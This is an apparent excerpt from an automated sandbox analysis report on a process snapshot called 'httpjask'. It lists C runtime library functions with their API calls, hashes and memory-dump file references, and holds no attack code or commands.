Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5566999e0ab72da053a8abcc3324ddc8aa4becb6fcadd465fa76c36a84b4dcdd
Instruction ID: 0bf20506030d0f10e26330e8fb3f6eac25d4d2b952ee6bd6a2d82c5f2163228c
Opcode Fuzzy Hash: 5566999e0ab72da053a8abcc3324ddc8aa4becb6fcadd465fa76c36a84b4dcdd
Instruction Fuzzy Hash: 32E08C3291122CEFCB14DB88CA1499AF3ECEB44B00B51549AF601E3110CA70DE00D7D0

Function 00F2058A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 00EEEFEC Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a143222fbadcdda3babb2bd23adbde204d1ca1d3ff22d9f4b52ceee6d3db84ec
Instruction ID: b4c2e2212579f63cd896b5e14f40442182a0b43421ed6b190bf91b735d9cf79e
Opcode Fuzzy Hash: a143222fbadcdda3babb2bd23adbde204d1ca1d3ff22d9f4b52ceee6d3db84ec
Instruction Fuzzy Hash: 7AC08C74201E8846CF29891082B17B63396A3A17C6F8028DCC5039B643C92F9C8BDA00

Function 00F0936A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 00F09382 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 00F2A556 Relevance: 54.3, APIs: 36, Instructions: 344
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

operator+.LIBCMT ref: 00F2A571

Part of subcall function 00F27680: DName::DName.LIBCMT ref: 00F27693
Part of subcall function 00F27680: DName::operator+.LIBCMT ref: 00F2769A

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
Instruction ID: e31f67bb7e0e046c48c22e1ff2700fb41fa8256056089b274702c21fc52054c2
Opcode Fuzzy Hash: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
Instruction Fuzzy Hash: 7DD10071D00229AFDF15EFA8E895AEEBBF4EF04310F14405AF501E7291EB349A85DB51

Function 00F2B29E Relevance: 27.3, APIs: 18, Instructions: 274
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnDecorator::getECSUDataType.LIBCMT ref: 00F2B43D
DName::operator=.LIBCMT ref: 00F2B4EB
DName::operator+=.LIBCMT ref: 00F2B516
DName::DName.LIBCMT ref: 00F2B57B
DName::operator+.LIBCMT ref: 00F2B582
DName::DName.LIBCMT ref: 00F2B5A5
DName::operator+.LIBCMT ref: 00F2B5AC
DName::operator+=.LIBCMT ref: 00F2B5B8
DName::operator=.LIBCMT ref: 00F2B5DF
DName::operator+=.LIBCMT ref: 00F2B5F1
UnDecorator::getPtrRefType.LIBCMT ref: 00F2B61A
operator+.LIBCMT ref: 00F2B62C

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
String ID:
API String ID: 1129569759-0
Opcode ID: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
Instruction ID: 4cbe08512a4207175ebd5b98412c8f7864dec00ff5a5cb7e778b200bbe67d712
Opcode Fuzzy Hash: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
Instruction Fuzzy Hash: 4E919472D04229EACF24EF58FC86ABD7B74AF14322F248157FD11DA192D7389A40EB51

Function 00F30B14 Relevance: 24.1, APIs: 16, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 00F30B2D
__calloc_crt.LIBCMT ref: 00F30B51
_free.LIBCMT ref: 00F30B5F
__calloc_crt.LIBCMT ref: 00F30B6D
_free.LIBCMT ref: 00F30B7D
_free.LIBCMT ref: 00F30B83
__copytlocinfo_nolock.LIBCMT ref: 00F30B92
__setlocale_nolock.LIBCMT ref: 00F30B9F
___removelocaleref.LIBCMT ref: 00F30BAB
___freetlocinfo.LIBCMT ref: 00F30BB2
_free.LIBCMT ref: 00F30BB8
__setmbcp_nolock.LIBCMT ref: 00F30BCA
_free.LIBCMT ref: 00F30BD8
___removelocaleref.LIBCMT ref: 00F30BDF
___freetlocinfo.LIBCMT ref: 00F30BE6
_free.LIBCMT ref: 00F30BEC

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2193103758-0
Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction ID: a7887e2d59db8bf81c598d5514d4eb00c0eb4301ec07ce26df07ba3f3a15bea8
Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction Fuzzy Hash: F721B535504A21FBD721BF29EC12D1AF7E5EF95B74F20842AF484D6162DF399840BA50

Function 00EE3C41 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00EE3C48
std::_Lockit::_Lockit.LIBCPMT ref: 00EE3C52
int.LIBCPMT ref: 00EE3C69

Part of subcall function 00EE16AA: std::_Lockit::_Lockit.LIBCPMT ref: 00EE16BB
Part of subcall function 00EE16AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00EE16D5

codecvt.LIBCPMT ref: 00EE3C8C
std::_Facet_Register.LIBCPMT ref: 00EE3CA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE3CC3
Concurrency::cancel_current_task.LIBCPMT ref: 00EE3CD0

Strings

C, xrefs: 00EE3CB0

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID: C
API String ID: 2133458128-2531096973
Opcode ID: 3086a1003b83ad05a67dfcfd6c002a511cc96307d7ea2f57d64240bfd0c38b1d
Instruction ID: 4450fed02fcc34f8fb08432e6523128e50278c7eedf93e043458f22af6fa4bed
Opcode Fuzzy Hash: 3086a1003b83ad05a67dfcfd6c002a511cc96307d7ea2f57d64240bfd0c38b1d
Instruction Fuzzy Hash: 8A01C0719041AD8BCB05EB7688096BDB7F5AF85310F285449F5117B392DFB09E01CB91

Function 00EF4783 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00EF49FC

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 137bc3d29ee79e77bb4b3125c40800d67da219fb11bfcc640a48dc46dd3c1ac6
Instruction ID: 8e42001371a7d42632d88991f50c604dab8a642f0b48c30f4a16becd1d26f4ce
Opcode Fuzzy Hash: 137bc3d29ee79e77bb4b3125c40800d67da219fb11bfcc640a48dc46dd3c1ac6
Instruction Fuzzy Hash: 4FB10FB0A0024DAFDB15DF99C880BBF7BF1AF84344F046199E655BB2D2D7B19902CB61

Function 00F27942 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 00F27967

Part of subcall function 00F27502: Replicator::operator[].LIBCMT ref: 00F27585
Part of subcall function 00F27502: DName::operator+=.LIBCMT ref: 00F2758D

DName::operator+.LIBCMT ref: 00F279C0
DName::DName.LIBCMT ref: 00F27A18

Strings

8;C, xrefs: 00F279B3
4;C, xrefs: 00F279FB
(;C, xrefs: 00F27A02
D;C, xrefs: 00F279AC

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: (;C$4;C$8;C$D;C
API String ID: 834187326-2621726175
Opcode ID: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
Instruction ID: bdce53c5cfc6a9cd9c37880083b18dfc09729446ef0df0cd0d4ac88f474dee0d
Opcode Fuzzy Hash: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
Instruction Fuzzy Hash: 8521C530A05318AFCB11EF1CE8419A97BF4FF0935AB048059E845CB323E734EA82DB48

Function 00EE536B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00EE5372
std::_Lockit::_Lockit.LIBCPMT ref: 00EE537C
int.LIBCPMT ref: 00EE5393

Part of subcall function 00EE16AA: std::_Lockit::_Lockit.LIBCPMT ref: 00EE16BB
Part of subcall function 00EE16AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00EE16D5

std::_Facet_Register.LIBCPMT ref: 00EE53CD
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE53ED
Concurrency::cancel_current_task.LIBCPMT ref: 00EE53FA

Strings

C, xrefs: 00EE53DA

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: C
API String ID: 55977855-2531096973
Opcode ID: f2f129dbee9c50e22fe54e758f189157ee925f52455e3b5df479c6dd07318ed0
Instruction ID: 476ae0b5d5a8bcdd25d981e1ca49d20761572c5e5986877fc927f1851d14f026
Opcode Fuzzy Hash: f2f129dbee9c50e22fe54e758f189157ee925f52455e3b5df479c6dd07318ed0
Instruction Fuzzy Hash: B611E17290069D9BCB00AB66C8466AEB7F4EF84314F14140EF451B7391DFB0AE00CB91

Function 00EE6AA9 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,?), ref: 00EE6AF2
__alloca_probe_16.LIBCMT ref: 00EE6B1E
MultiByteToWideChar.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 00EE6B5D
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EE6B7A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00EE6BB9
__alloca_probe_16.LIBCMT ref: 00EE6BD6
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EE6C18
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00EE6C3B

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 399d16d76a65badb4491b7f07e52337fcd1b937d10523e16a453bc5ba53d9920
Instruction ID: 036776eb29b9328f8764dbc57f200eef9a73ee9c2c5669415d7356835465da4b
Opcode Fuzzy Hash: 399d16d76a65badb4491b7f07e52337fcd1b937d10523e16a453bc5ba53d9920
Instruction Fuzzy Hash: 8851B27250029EAFDF209F52CC45FABBBA9EF54798F245028F914F6160D7759C14CB60

Function 00EEA598 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00EEA6B7
___TypeMatch.LIBVCRUNTIME ref: 00EEA7C5
CallUnexpected.LIBVCRUNTIME ref: 00EEA932

Strings

csm, xrefs: 00EEA6EE
csm, xrefs: 00EEA642
csm, xrefs: 00EEA5D5

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 3cacad9eb4d8fed5392f71689f2fe6087fec534a8d2b9ac52015657cddf325b6
Instruction ID: 6ef21d162d07e85d9d45cedecacd5c9ca2247e3bed365894c119b29c2da762f0
Opcode Fuzzy Hash: 3cacad9eb4d8fed5392f71689f2fe6087fec534a8d2b9ac52015657cddf325b6
Instruction Fuzzy Hash: 16B18B7180028DEFCF18DF96C8849AEBBB5BF14314B19617EE8117B212D731EA51CB96

Function 00EF1D5B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00EF1E68,?,?,00000000,00000000,?,?,00EF2016,00000021,FlsSetValue,00F013A8,00F013B0,00000000), ref: 00EF1E1C

Strings

api-ms-, xrefs: 00EF1DB2
ext-ms-, xrefs: 00EF1DC6

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 5b2f7b7595daefb3a2039fa1bebb98149c94f0cc6fffde4a6f31cb5de6e86c01
Instruction ID: e28c2050c5f4479d58e29e52cea2e5faeaf2c36aeca183d429bca361757cee9e
Opcode Fuzzy Hash: 5b2f7b7595daefb3a2039fa1bebb98149c94f0cc6fffde4a6f31cb5de6e86c01
Instruction Fuzzy Hash: 7421E731A0121DEBCB219BA5EC50A7A3768DB82769F241194EF15B7290EB71ED00D7E1

Function 00F292DB Relevance: 10.6, APIs: 7, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00F292E5
DName::DName.LIBCMT ref: 00F292F1

Part of subcall function 00F26FBC: DName::doPchar.LIBCMT ref: 00F26FED

UnDecorator::getScopedName.LIBCMT ref: 00F29330
DName::operator+=.LIBCMT ref: 00F2933A
DName::operator+=.LIBCMT ref: 00F29349
DName::operator+=.LIBCMT ref: 00F29355
DName::operator+=.LIBCMT ref: 00F29362

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID:
API String ID: 1480779885-0
Opcode ID: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
Instruction ID: 123a734b4c1ea09fb658dcaa1e205dcb3cf81ffd5c528a0d5ee4d6da18be7302
Opcode Fuzzy Hash: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
Instruction Fuzzy Hash: 8911C671904228AFC704EF68EC56BAD7BA4AF15311F044099E006DB2D2DB749E45E741

Function 00EE50EE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00EE50F5
std::_Lockit::_Lockit.LIBCPMT ref: 00EE5100
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE516E

Part of subcall function 00EE5251: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EE5269

std::locale::_Setgloballocale.LIBCPMT ref: 00EE511B
_Yarn.LIBCPMT ref: 00EE5131

Strings

C, xrefs: 00EE513D, 00EE5161

